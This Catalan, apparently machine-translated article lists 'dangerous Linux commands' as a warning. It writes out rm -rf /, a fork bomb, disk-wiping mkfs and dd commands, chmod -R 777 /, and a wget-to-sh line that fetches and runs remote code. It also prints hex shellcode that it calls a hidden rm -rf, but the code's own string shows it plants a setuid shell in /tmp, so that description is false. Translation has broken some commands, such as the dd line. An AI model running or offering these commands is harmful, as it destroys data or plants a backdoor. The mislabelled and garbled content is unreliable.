Les ordres més perilloses: no hauríeu d'executar mai a Linux


La interfície de línia d'ordres és una utilitat potent i pràctica per administrar un sistema Linux. Proporciona una manera ràpida i versàtil d'executar el sistema, especialment quan es gestionen sistemes sense cap que no tenen una interfície gràfica.

Tot i que és útil per gestionar el vostre sistema, la línia d'ordres està plena de riscos. L'execució d'ordres incorrectes pot causar danys i danys irrecuperables al vostre sistema. En aquesta guia, hem compilat una llista d'algunes de les ordres més arriscades que no hauríeu de pensar en executar al vostre sistema.

1. rm -rf/Comandament

L'ordre rm és una ordre de Linux que s'utilitza per eliminar fitxers i directoris en funció dels arguments utilitzats. Tanmateix, cal extremar la precaució quan utilitzeu l'ordre rm, ja que una petita errada ortogràfica o error pot provocar danys irrecuperables al sistema.

Quan s'executa com a root amb l'opció -rf /, l'ordre elimina de forma recursiva tots els fitxers i directoris del vostre sistema a partir de l'arrel (/), que és la més alta de Linux. Estructura de la jerarquia de fitxers. En poques paraules, l'ordre rm -rf / esborra completament el vostre sistema donant lloc a un sistema trencat i irrecuperable.

Algunes de les opcions utilitzades amb l'ordre rm són.

    L'ordre
  • rm a Linux s'utilitza per suprimir fitxers.
  • l'ordre rm -r suprimeix la carpeta de forma recursiva, fins i tot la carpeta buida.
  • l'ordre rm -f elimina Fitxer de només lectura sense demanar-ho.
  • rm -rf/: Força la supressió de tot el que hi ha al directori arrel.
  • rm -rf * : Força la supressió de tot el que hi ha al directori/directori de treball actual.
  • rm -rf . : Força la supressió de la carpeta i subcarpetes actuals.

De fet, quan executeu l'ordre com a usuari habitual, rebreu dos avisos al terminal.

Per evitar la supressió accidental de fitxers mitjançant l'ordre 'rm', creeu un àlies de l'ordre 'rm' com a 'rm -i' al fitxer \.bashrc', us demanarà que confirmeu cada supressió.

2. :(){:|:&};: Comandament

L'anterior és en realitat una bomba de forquilla. Funciona creant una funció anomenada :, que s'anomena dues vegades, una en primer pla i una altra en segon pla. La funció s'executa repetidament i, en fer-ho, consumeix tots els recursos del sistema donant lloc a una fallada del sistema.

De fet, una ordre de bomba de bifurcació és essencialment una forma d'atac DoS (Denegació de servei). També es coneix com el virus Wabbit o Rabbit. El pitjor és que no cal ser root per llançar aquest atac.

Afortunadament, podeu protegir-vos d'aquest atac limitant el nombre de processos executats pels usuaris locals a uns 4000.

Podeu fer-ho executant l'ordre:

$ ulimit -S -u 4000

Més tard podeu verificar-ho amb l'ordre:

$ ulimit -u

3. comanda > /dev/sda

Executar una ordre seguida de >/dev/sda sobreescriu el bloc /dev/sda del vostre disc dur. Aquest bloc conté dades del sistema de fitxers i, quan es sobreescriu, provoca un sistema danyat que és irrecuperable.

4. carpeta mv /dev/null

Una altra operació perjudicial que no hauríeu de provar és moure un directori o fitxer a /dev/null. El fitxer /dev/null és un tipus especial de fitxer conegut com a dispositiu nul o el forat negre. Tot el que es mou a /dev/null es descarta i es destrueix.

L'ordre següent mou tot el contingut del directori d'inici de l'usuari a /dev/null i, per tant, descarta totes les dades contingudes al directori d'inici de l'usuari.

# mv /home/user/* /dev/null

5. wget http://malicious_source -O- | sh

L'ordre wget és una ordre que baixa fitxers d'un servidor web o de fitxers. L'ordre anterior descarrega un script d'una font maliciosa i després l'executa.

6. mkfs.ext3 /dev/sda

L'ordre mkfs crea un nou sistema de fitxers (ext2, ext3, ext4, etc.) en un dispositiu d'emmagatzematge formatat, en la majoria dels casos una partició d'un disc dur. L'execució de l'ordre mkfs en una partició esborra totes les dades emmagatzemades en ella.

Tot i que és útil per formatar particions de disc, formatar una unitat sencera (com ara mkfs.ext3 /dev/sda) bloqueja el sistema i el deixa en un estat irrecuperable. Això passa perquè destrueix tots els fitxers del sistema juntament amb les vostres dades personals.

L'ordre també pot adoptar altres formes com es mostra a continuació.

# mkfs.ext4 /dev/sda
# mkfs.xfs /dev/sda
# mkfs.btrfs /dev/sda

7. > comanda fitxer

El fitxer > elimina el contingut d'un fitxer i el deixa en blanc. És sinònim de l'ordre cat /dev/null > file. Per tant, cal tenir precaució quan s'utilitzen els operadors de redirecció en un sistema Linux.

A continuació es mostra una demostració de com aquesta ordre sobreescriu un fitxer de text. Us podeu imaginar el desastre que provocaria aquesta comanda quan el fitxer implicat és un fitxer de configuració.

8. ^foo^bar

L'ordre ^foo^bar és tan perillosa com útil depenent de com s'executa. Tot i que us permet editar ordres executades anteriorment i executar-les de nou, pot ser desastrós si no us interessa els canvis fets a les ordres abans d'executar-les.

9. dd if=/dev/aleatori de=/dev/sda

L'ordre anterior elimina el bloc /dev/sda i escriu dades brossa aleatòries al bloc. El vostre sistema es quedaria en una fase inconsistent i irrecuperable.

10. Chmod -R 777 /

Tot i que pot ser que no es bloquegi immediatament el vostre sistema Linux, l'ordre chmod -R 777 / assigna de manera recursiva tots els permisos (llegir, escriure i executar) a tots els fitxers del vostre sistema Linux començant des de l'arrel.

Això exposa de manera efectiva tots els fitxers de configuració crítics i altres fitxers a tots els usuaris i això suposa un gran risc de seguretat per al vostre sistema. Qualsevol persona amb intencions nefastes pot jugar amb fitxers crucials i trencar fàcilment el vostre sistema.

11. L'ordre ocult

L'ordre següent no és més que la primera ordre de sobre (rm -rf). Aquí els codis s'amaguen en hexadecimal perquè un usuari ignorant es pugui enganyar. Si executeu el codi següent al vostre terminal, esborrarà la vostra partició arrel.

Aquesta ordre mostra aquí que l'amenaça pot estar oculta i normalment no detectable de vegades. Has de ser conscient del que estàs fent i quin seria el resultat. No compileu ni executeu codis d'una font desconeguda.

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Nota: No executeu cap de les ordres anteriors al vostre terminal o intèrpret d'ordres de Linux o a l'ordinador del vostre amic o de l'escola. Si voleu provar-los, executeu-los en una màquina virtual.

Qualsevol incoherència o pèrdua de dades, a causa de l'execució de l'ordre anterior, trencarà el vostre sistema de la qual, ni l'autor de l'article ni Tecmint són responsables.

Això és tot per ara. Aviat tornaré a ser aquí amb un altre article interessant que us encantarà llegir. Fins aleshores estigueu atents i connectats a Tecmint.

Si coneixeu altres ordres perilloses de Linux i voleu que els afegim a la llista, feu-nos-ho saber a través de la secció de comentaris i no us oblideu de donar els vostres valuosos comentaris.